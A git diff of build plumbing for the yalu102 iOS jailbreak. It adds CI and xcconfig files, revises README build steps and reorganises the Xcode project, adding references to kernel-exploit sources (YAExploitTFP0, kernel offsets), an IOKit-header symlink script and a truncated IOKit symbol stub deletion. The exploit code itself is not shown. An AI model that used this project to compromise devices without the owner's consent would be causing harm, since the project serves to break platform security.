diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 0000000..58b8265 --- /dev/null +++ b/.travis.yml @@ -0,0 +1,4 @@ +osx_image: xcode8.1 +language: objective-c +script: +- set -o pipefail && xcodebuild build -project yalu102.xcodeproj -xcconfig yalu102.xcconfig -configuration Debug CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO | xcpretty diff --git a/README.md b/README.md index 4df7f38..392ac4d 100644 --- a/README.md +++ b/README.md @@ -38,8 +38,7 @@ If you are already on iOS 10.2 with an iPhone 7, **stay there**. The actual expl 1. `git clone` the repo. 2. Open the repo in Xcode 3. Change the bundle ID, as shown [here](https://www.reddit.com/r/sideloaded/wiki/how-to-sideload#wiki_changing_the_bundle_identifier_and_team) -4. Include the IOKit headers, and add them to your search path. -5. Run the project. +4. Run the project. ## Warnings diff --git a/yalu102.xcconfig b/yalu102.xcconfig new file mode 100644 index 0000000..e5a83d4 --- /dev/null +++ b/yalu102.xcconfig @@ -0,0 +1,4 @@ +// Enter your custom team ID and bundle ID here. +// Do not commit the results into the git repository. +DEVELOPMENT_TEAM = CGTX3WH3ZS; +PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 3eafae9..7cbec97 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -7,6 +7,11 @@ objects = { /* Begin PBXBuildFile section */ + A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */ = {isa = PBXBuildFile; fileRef = A70DFAA01E3D35AC00769FE9 /* Kernels.plist */; }; + A70DFAAB1E3E35C200769FE9 /* YAKernelOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */; }; + A70DFAAF1E3E3B8900769FE9 /* YAExploitTFP0.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */; }; + A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = A72023711E3CFBCA00FADBFF /* IOKit.framework */; }; + A74FB7BC1E3F4DE4004651CA /* dropbear.plist in Resources */ = {isa = PBXBuildFile; fileRef = A74FB7BB1E3F4DE4004651CA /* dropbear.plist */; }; EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; EA1A3BAD1E399006009CA025 /* reload in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BAC1E399006009CA025 /* reload */; }; @@ -16,18 +21,27 @@ EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900ED1E1E9F060056FEBD /* ViewController.m */; }; EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900EF1E1E9F060056FEBD /* Main.storyboard */; }; EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */; }; - EA9901041E219C210056FEBD /* offsets.c in Sources */ = {isa = PBXBuildFile; fileRef = EA9901021E219C210056FEBD /* offsets.c */; }; EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901051E219FF10056FEBD /* bootstrap.tar */; }; EA99010A1E21A04C0056FEBD /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901091E21A04C0056FEBD /* tar */; }; EA99010C1E21A0520056FEBD /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EA99010B1E21A0520056FEBD /* launchctl */; }; EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = EA99010D1E21A1560056FEBD /* jailbreak.m */; }; - EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901131E21A1B00056FEBD /* iokitmig64.o */; }; - EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9901161E21A1D90056FEBD /* devicesupport.m */; }; - EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901181E21A2180056FEBD /* IOKit.tbd */; }; - EAA7F7C71E3EE4AF00BE3C64 /* dropbear.plist in Resources */ = {isa = PBXBuildFile; fileRef = EAA7F7C61E3EE4AF00BE3C64 /* dropbear.plist */; }; /* End PBXBuildFile section */ /* Begin PBXFileReference section */ + A70DFA9C1E3D314F00769FE9 /* jailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = jailbreak.h; sourceTree = ""; }; + A70DFA9D1E3D332500769FE9 /* include */ = {isa = PBXFileReference; lastKnownFileType = folder; path = include; sourceTree = ""; }; + A70DFA9F1E3D338B00769FE9 /* mac_policy.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mac_policy.h; sourceTree = ""; }; + A70DFAA01E3D35AC00769FE9 /* Kernels.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = Kernels.plist; sourceTree = ""; }; + A70DFAA21E3D8FAF00769FE9 /* csflags.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = csflags.h; sourceTree = ""; }; + A70DFAA91E3E35C200769FE9 /* YAKernelOffsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = YAKernelOffsets.h; sourceTree = ""; }; + A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = YAKernelOffsets.m; sourceTree = ""; }; + A70DFAAC1E3E389100769FE9 /* mach_vm.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mach_vm.h; sourceTree = ""; }; + A70DFAAD1E3E3B8900769FE9 /* YAExploitTFP0.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = YAExploitTFP0.h; sourceTree = ""; }; + A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = YAExploitTFP0.m; sourceTree = ""; }; + A72023711E3CFBCA00FADBFF /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; + A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */ = {isa = PBXFileReference; lastKnownFileType = text.xcconfig; path = yalu102.xcconfig; sourceTree = ""; }; + A74FB7BB1E3F4DE4004651CA /* dropbear.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = dropbear.plist; sourceTree = ""; }; + A766FD8B1E3E499A002A75CE /* pte_stuff.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = patchfinder64.o; sourceTree = ""; }; EA1A3BA61E398E33009CA025 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; @@ -42,18 +56,10 @@ EA9900F01E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; EA9900F51E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; EA9900F71E1E9F060056FEBD /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; - EA9901021E219C210056FEBD /* offsets.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsets.c; sourceTree = ""; }; - EA9901031E219C210056FEBD /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; EA9901051E219FF10056FEBD /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = ""; }; EA9901091E21A04C0056FEBD /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = ""; }; EA99010B1E21A0520056FEBD /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; EA99010D1E21A1560056FEBD /* jailbreak.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; }; - EA99010F1E21A1A00056FEBD /* pte_stuff.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; - EA9901131E21A1B00056FEBD /* iokitmig64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = iokitmig64.o; sourceTree = ""; }; - EA9901151E21A1D90056FEBD /* devicesupport.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = devicesupport.h; sourceTree = ""; }; - EA9901161E21A1D90056FEBD /* devicesupport.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = devicesupport.m; sourceTree = ""; }; - EA9901181E21A2180056FEBD /* IOKit.tbd */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = "sourcecode.text-based-dylib-definition"; path = IOKit.tbd; sourceTree = ""; }; - EAA7F7C61E3EE4AF00BE3C64 /* dropbear.plist */ = {isa = PBXFileReference; explicitFileType = file.bplist; path = dropbear.plist; sourceTree = ""; }; /* End PBXFileReference section */ /* Begin PBXFrameworksBuildPhase section */ @@ -61,19 +67,41 @@ isa = PBXFrameworksBuildPhase; buildActionMask = 2147483647; files = ( - EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */, EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */, - EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */, + A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXFrameworksBuildPhase section */ /* Begin PBXGroup section */ + A720236F1E3CFB3500FADBFF /* Resources */ = { + isa = PBXGroup; + children = ( + EA1A3BA61E398E33009CA025 /* 0.reload.plist */, + EA9901051E219FF10056FEBD /* bootstrap.tar */, + A74FB7BB1E3F4DE4004651CA /* dropbear.plist */, + EA99010B1E21A0520056FEBD /* launchctl */, + EA1A3BAC1E399006009CA025 /* reload */, + EA9901091E21A04C0056FEBD /* tar */, + ); + path = Resources; + sourceTree = ""; + }; + A72023701E3CFBB900FADBFF /* Frameworks */ = { + isa = PBXGroup; + children = ( + A72023711E3CFBCA00FADBFF /* IOKit.framework */, + ); + name = Frameworks; + sourceTree = ""; + }; EA9900DA1E1E9F060056FEBD = { isa = PBXGroup; children = ( + A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */, EA9900E51E1E9F060056FEBD /* yalu102 */, + A72023701E3CFBB900FADBFF /* Frameworks */, EA9900E41E1E9F060056FEBD /* Products */, ); sourceTree = ""; @@ -89,31 +117,30 @@ EA9900E51E1E9F060056FEBD /* yalu102 */ = { isa = PBXGroup; children = ( - EAA7F7C61E3EE4AF00BE3C64 /* dropbear.plist */, - EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, - EA9901021E219C210056FEBD /* offsets.c */, - EA9901031E219C210056FEBD /* offsets.h */, - EA99010D1E21A1560056FEBD /* jailbreak.m */, + A70DFA9D1E3D332500769FE9 /* include */, + EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, + A720236F1E3CFB3500FADBFF /* Resources */, + EA9900E61E1E9F060056FEBD /* Supporting Files */, + EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, + EA9900EF1E1E9F060056FEBD /* Main.storyboard */, EA9900E91E1E9F060056FEBD /* AppDelegate.h */, - EA1A3BA61E398E33009CA025 /* 0.reload.plist */, - EA1A3BAC1E399006009CA025 /* reload */, EA9900EA1E1E9F060056FEBD /* AppDelegate.m */, - EA9900EC1E1E9F060056FEBD /* ViewController.h */, - EA9900ED1E1E9F060056FEBD /* ViewController.m */, - EA9900EF1E1E9F060056FEBD /* Main.storyboard */, - EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, + A70DFAA21E3D8FAF00769FE9 /* csflags.h */, EA9900F71E1E9F060056FEBD /* Info.plist */, - EA9901051E219FF10056FEBD /* bootstrap.tar */, - EA9901091E21A04C0056FEBD /* tar */, - EA99010B1E21A0520056FEBD /* launchctl */, - EA9901131E21A1B00056FEBD /* iokitmig64.o */, + A70DFAA01E3D35AC00769FE9 /* Kernels.plist */, + A70DFA9F1E3D338B00769FE9 /* mac_policy.h */, + A70DFAAC1E3E389100769FE9 /* mach_vm.h */, + EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, - EA99010F1E21A1A00056FEBD /* pte_stuff.h */, - EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, - EA9901181E21A2180056FEBD /* IOKit.tbd */, - EA9901151E21A1D90056FEBD /* devicesupport.h */, - EA9901161E21A1D90056FEBD /* devicesupport.m */, - EA9900E61E1E9F060056FEBD /* Supporting Files */, + A766FD8B1E3E499A002A75CE /* pte_stuff.h */, + EA9900EC1E1E9F060056FEBD /* ViewController.h */, + EA9900ED1E1E9F060056FEBD /* ViewController.m */, + A70DFA9C1E3D314F00769FE9 /* jailbreak.h */, + EA99010D1E21A1560056FEBD /* jailbreak.m */, + A70DFAAD1E3E3B8900769FE9 /* YAExploitTFP0.h */, + A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */, + A70DFAA91E3E35C200769FE9 /* YAKernelOffsets.h */, + A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */, ); path = yalu102; sourceTree = ""; @@ -133,6 +160,7 @@ isa = PBXNativeTarget; buildConfigurationList = EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */; buildPhases = ( + A72976DF1E3CD3E10011A922 /* Create IOKit symlink */, EA9900DF1E1E9F060056FEBD /* Sources */, EA9900E01E1E9F060056FEBD /* Frameworks */, EA9900E11E1E9F060056FEBD /* Resources */, @@ -157,7 +185,7 @@ TargetAttributes = { EA9900E21E1E9F060056FEBD = { CreatedOnToolsVersion = 8.2.1; - DevelopmentTeam = CGTX3WH3ZS; + DevelopmentTeam = N3S4C3QL65; ProvisioningStyle = Automatic; }; }; @@ -189,9 +217,10 @@ EA99010C1E21A0520056FEBD /* launchctl in Resources */, EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */, EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */, - EAA7F7C71E3EE4AF00BE3C64 /* dropbear.plist in Resources */, EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */, + A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */, EA1A3BAD1E399006009CA025 /* reload in Resources */, + A74FB7BC1E3F4DE4004651CA /* dropbear.plist in Resources */, EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */, EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */, ); @@ -199,15 +228,32 @@ }; /* End PBXResourcesBuildPhase section */ +/* Begin PBXShellScriptBuildPhase section */ + A72976DF1E3CD3E10011A922 /* Create IOKit symlink */ = { + isa = PBXShellScriptBuildPhase; + buildActionMask = 2147483647; + files = ( + ); + inputPaths = ( + ); + name = "Create IOKit symlink"; + outputPaths = ( + ); + runOnlyForDeploymentPostprocessing = 0; + shellPath = /bin/sh; + shellScript = "set -x\nset -e\nDESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=\"$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\"\nif [ ! -e \"$DESTPATH/IOKit\" ]; then\n ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\nfi\n\nif [ ! -e \"$DESTPATH/libkern\" ]; then\n mkdir -p \"$DESTPATH/libkern\"\n ln -s \"$MACOSSDK/usr/include/libkern/OSTypes.h\" \"$DESTPATH/libkern/OSTypes.h\"\nfi\n"; + }; +/* End PBXShellScriptBuildPhase section */ + /* Begin PBXSourcesBuildPhase section */ EA9900DF1E1E9F060056FEBD /* Sources */ = { isa = PBXSourcesBuildPhase; buildActionMask = 2147483647; files = ( - EA9901041E219C210056FEBD /* offsets.c in Sources */, - EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */, EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */, EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */, + A70DFAAB1E3E35C200769FE9 /* YAKernelOffsets.m in Sources */, + A70DFAAF1E3E3B8900769FE9 /* YAExploitTFP0.m in Sources */, EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */, EA9900E81E1E9F060056FEBD /* main.m in Sources */, ); @@ -237,6 +283,7 @@ /* Begin XCBuildConfiguration section */ EA9900F81E1E9F060056FEBD /* Debug */ = { isa = XCBuildConfiguration; + baseConfigurationReference = A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; ARCHS = armv7; @@ -288,6 +335,7 @@ }; EA9900F91E1E9F060056FEBD /* Release */ = { isa = XCBuildConfiguration; + baseConfigurationReference = A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; ARCHS = armv7; @@ -336,15 +384,17 @@ buildSettings = { ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; - CLANG_ENABLE_OBJC_ARC = NO; - DEVELOPMENT_TEAM = CGTX3WH3ZS; + GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; + HEADER_SEARCH_PATHS = ( + "$(inherited)", + "$(PROJECT_DIR)/yalu102/include", + ); INFOPLIST_FILE = yalu102/Info.plist; LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; LIBRARY_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102", ); - PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; PRODUCT_NAME = "$(TARGET_NAME)"; VALID_ARCHS = armv7; }; @@ -355,15 +405,17 @@ buildSettings = { ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; - CLANG_ENABLE_OBJC_ARC = NO; - DEVELOPMENT_TEAM = CGTX3WH3ZS; + GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; + HEADER_SEARCH_PATHS = ( + "$(inherited)", + "$(PROJECT_DIR)/yalu102/include", + ); INFOPLIST_FILE = yalu102/Info.plist; LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; LIBRARY_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102", ); - PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; PRODUCT_NAME = "$(TARGET_NAME)"; VALID_ARCHS = armv7; }; diff --git a/yalu102/AppDelegate.h b/yalu102/AppDelegate.h index ccd8022..b641ee4 100644 --- a/yalu102/AppDelegate.h +++ b/yalu102/AppDelegate.h @@ -12,6 +12,4 @@ @property (strong, nonatomic) UIWindow *window; - @end - diff --git a/yalu102/AppDelegate.m b/yalu102/AppDelegate.m index 8dfdc30..8807e94 100644 --- a/yalu102/AppDelegate.m +++ b/yalu102/AppDelegate.m @@ -14,38 +14,31 @@ @interface AppDelegate () @implementation AppDelegate - - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { // Override point for customization after application launch. return YES; } - - (void)applicationWillResignActive:(UIApplication *)application { // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. } - - (void)applicationDidEnterBackground:(UIApplication *)application { // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. } - - (void)applicationWillEnterForeground:(UIApplication *)application { // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. } - - (void)applicationDidBecomeActive:(UIApplication *)application { // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. } - - (void)applicationWillTerminate:(UIApplication *)application { // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. } - @end diff --git a/yalu102/Base.lproj/Main.storyboard b/yalu102/Base.lproj/Main.storyboard index 0b7bd8a..5dee59f 100644 --- a/yalu102/Base.lproj/Main.storyboard +++ b/yalu102/Base.lproj/Main.storyboard @@ -1,6 +1,6 @@ - - + + @@ -19,11 +19,11 @@ - + + + + - + + + diff --git a/yalu102/IOKit.tbd b/yalu102/IOKit.tbd deleted file mode 100644 index f6b0829..0000000 --- a/yalu102/IOKit.tbd +++ /dev/null @@ -1,852 +0,0 @@ ---- -archs: [ armv7, armv7s, arm64, armv7k ] -platform: ios -install-name: /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit -current-version: 275.0 -exports: - - archs: [ armv7, armv7s, armv7k ] - symbols: [ _IOConnectMethodScalarIScalarO, _IOConnectMethodScalarIStructureI, - _IOConnectMethodScalarIStructureO, _IOConnectMethodStructureIStructureO, - _IOMapMemory, _io_async_method_scalarI_scalarO, - _io_async_method_scalarI_structureI, _io_async_method_scalarI_structureO, - _io_async_method_structureI_structureO, _io_catalog_get_data, - _io_catalog_get_gen_count, _io_catalog_module_loaded, - _io_catalog_reset, _io_catalog_send_data, _io_catalog_terminate, - _io_connect_add_client, _io_connect_async_method, - _io_connect_get_notification_semaphore, _io_connect_get_service, - _io_connect_map_memory, _io_connect_map_memory_into_task, - _io_connect_method, _io_connect_method_scalarI_scalarO, - _io_connect_method_scalarI_structureI, _io_connect_method_scalarI_structureO, - _io_connect_method_structureI_structureO, _io_connect_method_var_output, - _io_connect_set_notification_port, _io_connect_set_properties, - _io_connect_unmap_memory, _io_connect_unmap_memory_from_task, - _io_iterator_is_valid, _io_iterator_next, _io_iterator_reset, - _io_object_conforms_to, _io_object_get_bundle_identifier, - _io_object_get_class, _io_object_get_retain_count, - _io_object_get_superclass, _io_registry_create_iterator, - _io_registry_entry_create_iterator, _io_registry_entry_from_path, - _io_registry_entry_from_path_ool, _io_registry_entry_get_child_iterator, - _io_registry_entry_get_location_in_plane, _io_registry_entry_get_name, - _io_registry_entry_get_name_in_plane, _io_registry_entry_get_parent_iterator, - _io_registry_entry_get_path, _io_registry_entry_get_path_ool, - _io_registry_entry_get_properties, _io_registry_entry_get_properties_bin, - _io_registry_entry_get_property, _io_registry_entry_get_property_bin, - _io_registry_entry_get_property_bytes, _io_registry_entry_get_property_recursively, - _io_registry_entry_get_registry_entry_id, _io_registry_entry_in_plane, - _io_registry_entry_set_properties, _io_registry_get_root_entry, - _io_registry_iterator_enter_entry, _io_registry_iterator_exit_entry, - _io_server_version, _io_service_acknowledge_notification, - _io_service_add_interest_notification, _io_service_add_notification, - _io_service_add_notification_bin, _io_service_add_notification_ool, - _io_service_close, _io_service_get_authorization_id, - _io_service_get_busy_state, _io_service_get_matching_service, - _io_service_get_matching_service_bin, _io_service_get_matching_service_ool, - _io_service_get_matching_services, _io_service_get_matching_services_bin, - _io_service_get_matching_services_ool, _io_service_get_state, - _io_service_match_property_table, _io_service_match_property_table_bin, - _io_service_match_property_table_ool, _io_service_open_extended, - _io_service_request_probe, _io_service_set_authorization_id, - _io_service_wait_quiet ] - - archs: [ armv7, armv7s, arm64, armv7k ] - symbols: [ _IOAVAudioFormatTypeString, _IOAVAudioGetChannelAllocation, - _IOAVAudioGetChannelAllocationDefault, _IOAVAudioGetChannelLayoutData, - _IOAVAudioGetSpeakerAllocationMask, _IOAVAudioInterfaceCopyChannelLayoutElements, - _IOAVAudioInterfaceCopyDiagnosticsString, _IOAVAudioInterfaceCopyElements, - _IOAVAudioInterfaceCopyProperties, _IOAVAudioInterfaceCopyProperty, - _IOAVAudioInterfaceCreate, _IOAVAudioInterfaceCreateWithService, - _IOAVAudioInterfaceGetLinkData, _IOAVAudioInterfaceGetLinkDataWithSource, - _IOAVAudioInterfaceGetService, _IOAVAudioInterfaceGetTypeID, - _IOAVAudioInterfaceSetLogLevel, _IOAVAudioInterfaceSetLogLevelMask, - _IOAVAudioInterfaceSetProperty, _IOAVAudioInterfaceStartLink, - _IOAVAudioInterfaceStartLinkWithSource, _IOAVAudioInterfaceStopLink, - _IOAVAudioInterfaceStopLinkWithSource, _IOAVAudioSampleRate, - _IOAVAudioSampleRateScalar, _IOAVAudioSampleSize, - _IOAVAudioSpeakerString, _IOAVCommandString, _IOAVControlInterfaceCopyDiagnosticsString, - _IOAVControlInterfaceCopyProperties, _IOAVControlInterfaceCopyProperty, - _IOAVControlInterfaceCreate, _IOAVControlInterfaceCreateWithService, - _IOAVControlInterfaceGetService, _IOAVControlInterfaceGetTypeID, - _IOAVControlInterfaceSetLogLevel, _IOAVControlInterfaceSetLogLevelMask, - _IOAVControlInterfaceSetProperty, _IOAVControllerClearEventLog, - _IOAVControllerCopyDiagnosticsString, _IOAVControllerCopyProperties, - _IOAVControllerCopyProperty, _IOAVControllerCreate, - _IOAVControllerCreateWithLocation, _IOAVControllerCreateWithService, - _IOAVControllerForceHotPlugDetect, _IOAVControllerGetLocation, - _IOAVControllerGetPower, _IOAVControllerGetTypeID, - _IOAVControllerSetEventLogCommandMask, _IOAVControllerSetEventLogEventMask, - _IOAVControllerSetEventLogSize, _IOAVControllerSetLogLevel, - _IOAVControllerSetLogLevelMask, _IOAVControllerSetPower, - _IOAVControllerSetProperty, _IOAVControllerSetProtectionType, - _IOAVControllerSetQualityPattern, _IOAVCreateDiagnosticsReference, - _IOAVCreateDiagnosticsReferenceWithLocation, _IOAVCreateDiagnosticsString, - _IOAVCreateDiagnosticsStringWithLocation, _IOAVCreateStringWithAudioChannelLayoutData, - _IOAVCreateStringWithAudioLinkData, _IOAVCreateStringWithData, - _IOAVCreateStringWithElement, _IOAVCreateStringWithElements, - _IOAVCreateStringWithVideoColorData, _IOAVCreateStringWithVideoLinkData, - _IOAVCreateStringWithVideoTimingData, _IOAVDeviceClearEventLog, - _IOAVDeviceCopyDiagnosticsString, _IOAVDeviceCopyProperties, - _IOAVDeviceCopyProperty, _IOAVDeviceCreate, _IOAVDeviceCreateWithLocation, - _IOAVDeviceCreateWithService, _IOAVDeviceGetController, - _IOAVDeviceGetLinkData, _IOAVDeviceGetLocation, - _IOAVDeviceGetPower, _IOAVDeviceGetProtectionStatus, - _IOAVDeviceGetProtectionType, _IOAVDeviceGetTypeID, - _IOAVDeviceReadI2C, _IOAVDeviceSetEventLogCommandMask, - _IOAVDeviceSetEventLogEventMask, _IOAVDeviceSetEventLogSize, - _IOAVDeviceSetLogLevel, _IOAVDeviceSetLogLevelMask, - _IOAVDeviceSetPower, _IOAVDeviceSetProperty, _IOAVDeviceStartLink, - _IOAVDeviceStopLink, _IOAVDeviceWriteI2C, _IOAVEDIDIsStandard, - _IOAVElementTypeString, _IOAVEventLogEventTypeString, - _IOAVGetCEAVideoShortID, _IOAVGetCEAVideoShortIDWithData, - _IOAVGetCEAVideoShortIDWithDataActive, _IOAVGetCEAVideoTimingData, - _IOAVGetCEAVideoTimingDataWithShortID, _IOAVGetCVTVideoTimingData, - _IOAVGetDMTVideoTimingData, _IOAVGetGTFVideoTimingData, - _IOAVGetSPDInfoFrame, _IOAVGetSupportedVideoTimingDataList, - _IOAVGetTransportSupportsCEA, _IOAVGetTransportSupportsYCbCr, - _IOAVGetVideoTimingData, _IOAVGetVideoTimingITSource, - _IOAVHDMIAudioClockRegenerationDataForLink, _IOAVInfoFrameGetChecksum, - _IOAVInfoFrameTypeString, _IOAVLinkSourceString, - _IOAVLinkTypeString, _IOAVLocationString, _IOAVProtectionStatusString, - _IOAVProtectionTypeString, _IOAVRecoverableError, - _IOAVServiceClearEventLog, _IOAVServiceCopyDiagnosticsString, - _IOAVServiceCopyEDID, _IOAVServiceCopyProperties, - _IOAVServiceCopyProperty, _IOAVServiceCreate, _IOAVServiceCreateWithLocation, - _IOAVServiceCreateWithService, _IOAVServiceGetDevice, - _IOAVServiceGetLinkData, _IOAVServiceGetLinkDataWithSource, - _IOAVServiceGetPower, _IOAVServiceGetProtectionStatus, - _IOAVServiceGetProtectionType, _IOAVServiceGetTypeID, - _IOAVServiceSetEventLogCommandMask, _IOAVServiceSetEventLogEventMask, - _IOAVServiceSetEventLogSize, _IOAVServiceSetLogLevel, - _IOAVServiceSetLogLevelMask, 